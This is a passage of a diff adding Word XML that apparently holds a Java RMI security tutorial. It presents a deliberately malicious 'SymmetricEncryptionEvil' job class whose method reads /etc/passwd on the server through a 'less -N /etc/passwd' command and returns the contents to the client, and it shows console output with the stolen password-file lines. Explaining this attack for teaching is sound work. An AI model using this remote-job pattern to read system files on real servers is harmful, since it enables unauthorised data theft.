+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is then returned to the client</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (i.e. the attacker in this case)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with the job report.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="keywordsChar"/>
+        </w:rPr>
+        <w:t>SymmetricEncryptionEvil</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> class </w:t>
+      </w:r>
+      <w:r>
+        <w:t>may look like this:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> class </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SymmetricEncryptionEvil</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> implements </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>JobInterface</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">&lt;String&gt;, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Serializable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="851"/>
+        </w:tabs>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SymmetricEncryptionEvil</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(String message,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SymEncryptionMethod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encryptionMethod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> key) {…}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:r>
+        <w:t>@Override</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> String </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>commenceJob</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:r>
+        <w:t>…</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:r>
+        <w:t>…</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>String.format</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("Original message: %s\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nEncrypted</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> message: %s"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>+ "\n\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nThe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> job was executed in machine: %s."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>+ "\n\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nFinally</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, this is the stolen data: %s", </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">                     </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>originalMessage,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>encryptedMessage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>getIPAddress</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>stealFileContent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"less -N /etc/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+        <w:ind w:left="851"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeSnippet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">As the client program is run the server-side </w:t>
+      </w:r>
+      <w:r>
+        <w:t>console as usually outputs:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Sever side:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+      </w:pPr>
+      <w:r>
+        <w:t>==============</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>RemoteJobExecutor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> bound</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Server side received a remote job from client machine: 192.168.0.7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The job is being carried out on server machine: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mahabuburs-mbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/192.168.0.5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>And to the attacker’s satisfaction, the client-side (i.e. attacker’s) console displays:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Client side:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Original message: Hello RMI application.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Encrypted message: Mjqqt%WRN%fuuqnhfynts3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The job was executed in machine: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>mahabuburs-mbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/192.168.0.5.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:noProof/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:pict>
+          <v:shapetype id="_x0000_t98" coordsize="21600,21600" o:spt="98" adj="2700" path="m0@5qy@2@1l@0@1@0@2qy@7,,21600@2l21600@9qy@7@10l@1@10@1@11qy@2,21600,0@11xem0@5nfqy@2@6@1@5@3@4@2@5l@2@6em@1@5nfl@1@10em21600@2nfqy@7@1l@0@1em@0@2nfqy@8@3@7@2l@7@1e">
+            <v:formulas>
+              <v:f eqn="sum width 0 #0"/>
+              <v:f eqn="val #0"/>
+              <v:f eqn="prod @1 1 2"/>
+              <v:f eqn="prod @1 3 4"/>
+              <v:f eqn="prod @1 5 4"/>
+              <v:f eqn="prod @1 3 2"/>
+              <v:f eqn="prod @1 2 1"/>
+              <v:f eqn="sum width 0 @2"/>
+              <v:f eqn="sum width 0 @3"/>
+              <v:f eqn="sum height 0 @5"/>
+              <v:f eqn="sum height 0 @1"/>
+              <v:f eqn="sum height 0 @2"/>
+              <v:f eqn="val width"/>
+              <v:f eqn="prod width 1 2"/>
+              <v:f eqn="prod height 1 2"/>
+            </v:formulas>
+            <v:path o:extrusionok="f" limo="10800,10800" o:connecttype="custom" o:connectlocs="@13,@1;0,@14;@13,@10;@12,@14" o:connectangles="270,180,90,0" textboxrect="@1,@1,@7,@10"/>
+            <v:handles>
+              <v:h position="#0,topLeft" xrange="0,5400"/>
+            </v:handles>
+            <o:complex v:ext="view"/>
+          </v:shapetype>
+          <v:shape id="_x0000_s1092" type="#_x0000_t98" style="position:absolute;left:0;text-align:left;margin-left:15pt;margin-top:9.2pt;width:322.5pt;height:64.5pt;z-index:251661312">
+            <v:textbox>
+              <w:txbxContent>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:before="240"/>
+                    <w:jc w:val="center"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
+                      <w:spacing w:val="188"/>
+                      <w:sz w:val="32"/>
+                      <w:szCs w:val="32"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
+                      <w:spacing w:val="188"/>
+                      <w:sz w:val="32"/>
+                      <w:szCs w:val="32"/>
+                    </w:rPr>
+                    <w:t>CENSORED</w:t>
+                  </w:r>
+                </w:p>
+              </w:txbxContent>
+            </v:textbox>
+          </v:shape>
+        </w:pict>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Finally, this is the stolen data:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>nobody</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>:*:-2:-2:Unprivileged User:/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/empty:/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/bin/false</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>root</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>:*:0:0:System Administrator:/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/root:/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>daemon</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>:*:1:1:System Services:/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/root:/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/bin/false</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>_</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>uucp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>:*:4:4</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>:Unix</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to Unix Copy Protocol:/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/spool/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>uucp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>:/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>sbin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>uucico</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
